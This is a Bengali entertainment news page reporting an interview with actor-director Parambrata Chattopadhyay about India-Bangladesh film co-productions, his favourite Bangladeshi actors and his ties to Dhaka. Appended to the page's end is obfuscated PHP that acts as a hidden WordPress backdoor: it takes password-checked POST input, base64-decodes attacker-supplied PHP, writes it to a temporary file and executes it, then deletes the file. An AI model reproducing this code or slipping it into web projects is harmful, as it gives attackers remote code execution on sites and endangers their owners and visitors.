সোমবার, ১৭ই জুন, ২০২৪ খ্রিস্টাব্দ ৩রা আষাঢ়, ১৪৩১ বঙ্গাব্দ

শাকিব খান আর জয়া আহসান আমার পছন্দের : পরমব্রত

news-image

বিনোদন প্রতিবেদক : যৌথ প্রযোজনার ক্ষেত্রে মাঝে মাঝেই ভারতীয় প্রযোজকরা বাংলাদেশি প্রযোজকদের ওপর অনেক কিছু চাপিয়ে দেন এবং এই প্রবণতাটা দূর করাটা খুব দরকার, বলেছেন অভিনেতা এবং নির্দেশক পরমব্রত চট্টোপাধ্যায় ।

কালের কণ্ঠ কে দেয়া একান্ত সাক্ষাতকারে –সুজয় ঘোষের নির্দেশিতি ‘কাহানি’ সিনেমার পুলিশ ইন্সপেকটার সাত্যকি সিনহা ভারত-বাংলাদেশ যৌথ প্রযোজনায় নির্মিত সিনেমার সংখ্যা কীভাবে আরও বাড়ানো যায়, তা নিয়ে নিজের মতামত জানিয়েছেন।

‘আমি ইন্ডিয়ান প্রযোজকদের একটু দোষ দেবো … আমি দেখেছি , অনেক কিছু চাপিয়ে দেওয়া হয় বাংলাদেশি প্রযোজকদের ওপরে। যদিও যৌথ প্রযোজনার কথা বলা হয় , অবদান এবং প্রতিদান ভাগাভাগিটা সবসময় ৫০:৫০ হয় না। দেখা যায় কখনো বণ্টন ৭০:৩০ হয়ে গেছে। তাই অনেক ক্ষোভ জন্মায়, বলেন পরমব্রত।

যদিও পরমব্রতের মনে হয়, ৭০:৩০ বণ্টনে ভুল কিছু নেই ,কিন্তু সেই ক্ষেত্রে আগে থেকে স্বচ্ছতার সাথে নির্ধারণ করা উচিত যে কি হারে অনুদান এবং প্রতিদান বণ্টন হবে। ‘ব্যবস্থাপনাটা কিন্তু স্বচ্ছ হতে হবে, এটা খুব জরুরি, উনার মতো ঋত্বিক ঘটক এবং হাবিবুর খানের হাত ধরে ১৯৭৩ সালে দুই দেশে একসাথে তৈরি হয়েছিল ‘তিতাস একটি নদীর নাম।’

সেই ধারা এগিয়ে নিয়ে গেছিলেন গৌতম ঘোষ যখন ১৯৯৩সালে মুক্তি পেল পদ্মা নদীর মাঝি । পরমের চাহিদা যেন যৌথ প্রযোজনা যেন আরও বাড়ে, কিন্তু, বাংলাদেশের সিনেমার নির্মাতাদের মতো, তারও অন্যতম শর্ত ‘বিষয়বস্তু বাঙালি হওয়া দরকার।’

দক্ষিণ ভারতের রাজ্যগুলোতে নির্মিত সিনেমার রিমেককে যৌথ প্রযোজনার মোড়কে মুড়ে দুই বাংলায় চালানোর বিরুদ্ধে মাঝে মাঝেই সরব হয়েছেন ঢালিউডের অনেকে ‘যৌথ প্রযোজনার ক্ষেত্রে যৌথ কথাটা লুকিয়ে আছে…সেটা ভুলে গেলে চলবে না’ বলেছেন পরমব্রত। যার কাছে ঢাকা ‘সেকেন্ড হোম’ এতো বন্ধু…এত রকমের বন্ধু…এত জনের সাথে মিশেছি। আমি সবসময় ঢাকায় যাওয়ার জন্য মুখিয়ে থাকি’ কোলকাতার যোধপুর পার্কের নিজের অফিসে বসে কালের কণ্ঠকে এমনটাই জানালেন পরমব্রত।

বাংলাদেশের সিনেমা নিয়ে পরমব্রত –বন্ধুরা উনাকে পরম বলে ডাকেন – বলেছেন উনার অনেক আগ্রহ। বললেন, ‘প্রচুর ট্যালেন্টেড মানুষ আছেন। যেটা আমার ভালো লাগে, সেটা হলো , এত সুন্দর মাটির কাছাকাছি গল্প তুলে আনতে পারেন বাংলাদেশের মানুষ। ভাবার ক্ষমতার দিক থেকে আমি উনাদের এগিয়ে রাখবো বলেছেন পরমব্রত।

তবে টলিউডের এই মিষ্টি নায়ক এটাও মনে করিয়ে দিয়েছেন যে ভাবনাচিন্তা, ব্যবস্থাপনায় আরও একটু পেশাদারীত্ব দেখানো উচিত বাংলাদেশের ফিল্ম ,ইন্ডাস্ট্রির সাথে যুক্ত মানুষদের।

খোলামেলা সাক্ষাৎকারে চটজলদি প্রশ্ন –নুসরাত ফারিয়া না জয়া আহসান এবং শাকিব না ফেরদৌস – পরমব্রত পছন্দ জানালেন পলক ফেলার আগেই। ‘অবশ্যই জয়া আহসান… আর শাকিব আমার পছন্দের, ‘হাসিমুখে জানালেন পরমব্রত।’

কথা বলার ফাঁকে পরমব্রত জানিয়েছেন মোস্তফা সরওয়ার ফারুকীর সিনেমা ‘শনিবার বিকেল’ – ছবিতে কিছুদিনের মধ্যেই বাংলাদেশের দর্শকেরা ওনাকে দেখতে পাবেন। এ প্রসঙ্গে তিনি বলেন, এতো কাজ করতে থাকি বাংলাদেশে যে ঢাকা আমার একটা বাড়ি হয়ে গেছে।

বাংলাদেশ অনেক ঘুরেছেন পরমব্রত ,তবে না যাওয়ার জায়গার লিস্টটাও বেশ বড়। “বরিশাল যাইনি, উত্তরবঙ্গ যাইনি বান্দরবন যাইনি … বাংলাদেশের সুন্দরবন , যেটা আসল সুন্দরবন সেখানেও যাওয়ার খুব শখ আমার,” কালেরকণ্ঠ কে জানিয়ে ফেললেন মনের কথা। যদিও ইদানীং পরমব্রত অনেক সময় বোম্বেতে কাটান, জানালেন আদ্যান্তে বাঙালি উনি এবং বাংলা সিনেমার আকর্ষণ ওনার কাছে সবসময়ই আলাদা।

দুই দেশের মধ্যে পরমব্রত চান আরও সাংস্কৃতিক আদান-প্রদান হোক, তবে তার জন্য পরমব্রত দুই দেশের তরুণ প্রজন্মকে কিছু দায়িত্ব দিতে চান। ‘দুই দেশের ইতিহাস টা জানতে হবে , ভূগোল টা বুঝতে হবে। তাহলেই বোঝা যাবে, নাড়ির টান আছে,’ বলেছেন কোলকাতার ‘ থিংকিং অ্যাক্টর’ পরমব্রত । সূত্র: কালের কণ্ঠ

এ জাতীয় আরও খবর

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}